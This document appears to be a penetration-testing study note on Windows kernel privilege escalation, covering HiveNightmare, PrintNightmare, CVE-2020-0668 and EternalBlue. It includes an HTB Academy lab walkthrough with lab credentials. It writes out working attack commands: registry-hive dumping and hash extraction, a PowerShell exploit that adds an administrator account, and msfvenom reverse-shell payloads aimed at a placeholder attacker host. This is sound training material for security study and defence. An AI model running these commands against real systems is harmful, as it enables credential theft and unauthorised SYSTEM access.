💣Kernel Exploits

🎯 Overview

Kernel exploits leverage vulnerabilities in the Windows kernel to gain SYSTEM privileges. Historical Windows systems have numerous known exploits, while modern systems have fewer but still critical vulnerabilities. 100% patch compliance is rarely achieved, creating opportunities for local privilege escalation.

📊 Historical Vulnerability Landscape

Major Exploit Families by Windows Version

# Legacy Systems (High Exploit Count):
Windows XP/2003    → MS08-067, MS08-068, MS09-012, MS10-015, MS11-046
Windows Vista/2008 → MS08-025, MS09-050, MS10-059, MS10-092
Windows 7/2008R2   → MS11-011, MS13-005, MS13-053, MS14-058, MS15-051
Windows 8/8.1/2012 → MS13-081, MS14-040, MS15-076, MS16-032

# Modern Systems (Fewer but Critical):
Windows 10/2016/2019 → MS17-010, CVE-2021-36934, CVE-2021-1675, CVE-2020-0668

Evolution Pattern

# Vulnerability trends:
- Legacy systems: 30+ known kernel exploits
- Windows 7: 15+ exploits (still common in enterprise)
- Windows 10: 5+ critical exploits (ongoing discoveries)
- Server 2019: Active research target with new findings

🔥 Notable Legacy Vulnerabilities

MS08-067 (Conficker/Legacy)

# Remote Code Execution in "Server" service
- Affected: Windows XP/Vista/2003/2008
- Impact: Unauthenticated RCE as SYSTEM
- Usage: Remote exploit or local port forward (445)
- Status: Still found in medical/industrial environments

MS17-010 (EternalBlue)

# SMBv1 Protocol Vulnerability
- Affected: Windows XP through Server 2016
- Impact: Remote code execution as SYSTEM
- Vector: SMB protocol mishandling crafted packets
- Usage: Direct remote exploit or local privilege escalation

💀 Modern Critical Vulnerabilities

CVE-2021-36934 (HiveNightmare/SeriousSam)

# Registry Hive Access Vulnerability
- Affected: Windows 10 (specific builds)
- Impact: ANY user can read SAM/SYSTEM/SECURITY hives
- Requirement: Shadow copies present (default on most systems)

# Detection:
icacls c:\Windows\System32\config\SAM
# Vulnerable if: BUILTIN\Users:(I)(RX)

# Exploitation:
.\HiveNightmare.exe
# Creates: SAM-DATE, SYSTEM-DATE, SECURITY-DATE files

# Hash extraction:
impacket-secretsdump -sam SAM-DATE -system SYSTEM-DATE -security SECURITY-DATE local

CVE-2021-1675 (PrintNightmare)

# Print Spooler RPC Vulnerability
- Affected: All Windows versions with Spooler service
- Impact: Remote code execution as SYSTEM
- Vector: RpcAddPrinterDriver abuse

# Detection:
ls \\localhost\pipe\spoolss    # Check if Spooler running

# PowerShell exploitation:
Set-ExecutionPolicy Bypass -Scope Process
Import-Module .\CVE-2021-1675.ps1
Invoke-Nightmare -NewUser "hacker" -NewPassword "Pwnd1234!" -DriverName "PrintIt"

# Verification:
net user hacker    # Should show local administrator

CVE-2020-0668 (Service Tracing)

# Arbitrary File Move Vulnerability
- Affected: Windows 10 (multiple builds)
- Impact: Privileged file write leading to code execution
- Vector: Windows Service Tracing MaxFileSize manipulation

# Prerequisites:
- Third-party service binary (e.g., Mozilla Maintenance Service)
- Unprivileged startable service running as SYSTEM

# Exploitation chain:
1. Generate malicious binary: msfvenom -p windows/x64/meterpreter/reverse_https LHOST=IP LPORT=443 -f exe
2. Execute exploit: CVE-2020-0668.exe source.exe "target_service_path"
3. Overwrite with clean malicious binary
4. Start service for SYSTEM shell

🔍 Patch Enumeration

System Update Analysis

# Multiple methods for patch assessment:
systeminfo                    # Comprehensive system information
wmic qfe list brief           # Quick Fix Engineering (patches)
Get-Hotfix                    # PowerShell patch enumeration

# Example output analysis:
wmic qfe list brief
Description      HotFixID   InstallDate  InstalledBy
Security Update  KB5000808               NT AUTHORITY\SYSTEM

# Research patches:
# Search KB numbers in Microsoft Update Catalog
# Cross-reference with exploit databases

Vulnerability Assessment Workflow

# 1. Enumerate system version
[environment]::OSVersion.Version

# 2. List installed patches
wmic qfe list brief | find "KB"

# 3. Cross-reference with vulnerability matrices
# Check exploit databases for missing patches

# 4. Prioritize based on:
- Local privilege escalation vectors
- Available exploit code
- System architecture compatibility

🎯 HTB Academy Lab Solution

Lab Environment

• Credentials: htb-student:HTB_@cademy_stdnt!

• Access Method: RDP

• Objective: Escalate to NT AUTHORITY\SYSTEM using 3 different kernel exploits

• Flag Location: Administrator Desktop

Complete Walkthrough

Method 1: HiveNightmare (CVE-2021-36934)

# 1. Check vulnerability
icacls c:\Windows\System32\config\SAM
# Look for: BUILTIN\Users:(I)(RX)

# 2. Execute exploit
.\HiveNightmare.exe

# 3. Transfer files and extract hashes
# Use extracted hashes for authentication

Method 2: PrintNightmare (CVE-2021-1675)

# 1. Verify Spooler service
ls \\localhost\pipe\spoolss

# 2. Execute PowerShell exploit
Set-ExecutionPolicy Bypass -Scope Process
Import-Module .\CVE-2021-1675.ps1
Invoke-Nightmare -NewUser "admin123" -NewPassword "Password123!"

# 3. Login with new admin user or use privileges

Method 3: CVE-2020-0668 (File Move)

# 1. Generate malicious service binary
msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACK_IP LPORT=4444 -f exe > malicious.exe

# 2. Execute privilege escalation
.\CVE-2020-0668.exe C:\Users\htb-student\Desktop\malicious.exe "C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe"

# 3. Start service for SYSTEM access
net start MozillaMaintenance

# 4. Access Administrator Desktop flag
type C:\Users\Administrator\Desktop\flag.txt

🛠️ Exploitation Tools & Techniques

Essential Tools

# Kernel exploit frameworks:
- Windows-Exploit-Suggester    # Patch analysis
- Sherlock.ps1                 # PowerShell exploit suggester  
- Watson                       # .NET exploit suggester
- Metasploit local exploits    # Automated exploitation

# Manual analysis:
- systeminfo + online databases
- Microsoft Update Catalog research
- CVE databases and PoC repositories

Exploitation Strategy

# 1. System reconnaissance
systeminfo | findstr /B "OS Name" "OS Version" "System Type"

# 2. Patch analysis
wmic qfe list brief

# 3. Exploit selection based on:
- Windows version/architecture
- Available patches
- Service requirements
- Stealth considerations

# 4. Execution methodology:
- Test in isolated environment
- Understand exploit requirements
- Prepare post-exploitation steps
- Plan cleanup procedures

⚠️ Detection & Defense

Detection Indicators

# Monitor for:
- Unusual service manipulation
- Registry hive access patterns
- Printer driver installation attempts
- Privilege escalation events (Event ID 4672)
- Process creation with SYSTEM context

Defensive Measures

# Security hardening:
- Maintain current patch levels
- Implement defense-in-depth
- Monitor for exploit artifacts
- Disable unnecessary services (Print Spooler if not needed)
- Regular vulnerability assessments
- Application whitelisting

💡 Key Takeaways

1. Legacy systems have extensive exploit surface area

2. Modern systems still vulnerable to critical flaws

3. Patch management is rarely 100% effective

4. Local port forwarding can enable remote exploits

5. Multiple exploitation paths often available

6. Post-exploitation cleanup essential for stealth

---

Kernel exploits remain a viable privilege escalation vector due to the complexity of maintaining perfect patch compliance in enterprise environments.